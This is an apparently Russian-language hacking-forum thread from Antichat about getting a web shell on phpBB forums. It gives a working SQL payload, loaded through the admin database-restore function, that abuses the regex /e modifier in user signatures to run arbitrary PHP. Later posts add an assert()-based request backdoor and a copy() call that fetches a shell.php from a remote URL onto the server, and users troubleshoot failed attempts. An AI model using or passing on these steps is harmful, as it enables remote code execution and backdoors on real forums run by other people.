ANTICHAT - phpbb shell

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - phpbb shell (https://forum.antichat.xyz/showthread.php?t=317744)

Цитата:

Сообщение от None

После того как "залатали" багу (3), обнаружилось, что залатали, вывод в профайл, а сама бага живая. (Нужны админские права).
Video: http://video.antichat.ru/file178.html
Эта бага присутсвует, почти на всех форумах, ее редко где залатали.
Как юзать:
Создаем текстовый файл 1.sql суем в него код
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
ну вместо 2 ставим свой id
Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца
заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.

И какие команды есть для заливик шелла?

Вместо phpinfo() свой код ставь, например:

assert(stripslashes($_REQUEST[cod]));

После этого зайди в свой профиль, добавь к концу url:

&cod=PHP_CODE

PHP_CODE:

copy(что,куда);

Например.

А еще есть способы заливик шелла в phpBB 2.0.23

Цитата:

Сообщение от lansia

А еще есть способы заливик шелла в phpBB 2.0.23

+1 Также интересует

тоже самое интересует

Цитата:

Сообщение от None

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;

так работает, safe_mode off

пробовал залить так

profile.php?mode=editprofile&c=copy('http://откуда','/куда/shell.php');

но не получается, при переходе страница отсутствует (на других форумах получалось, а вот с одним мучаюсь да бестолку)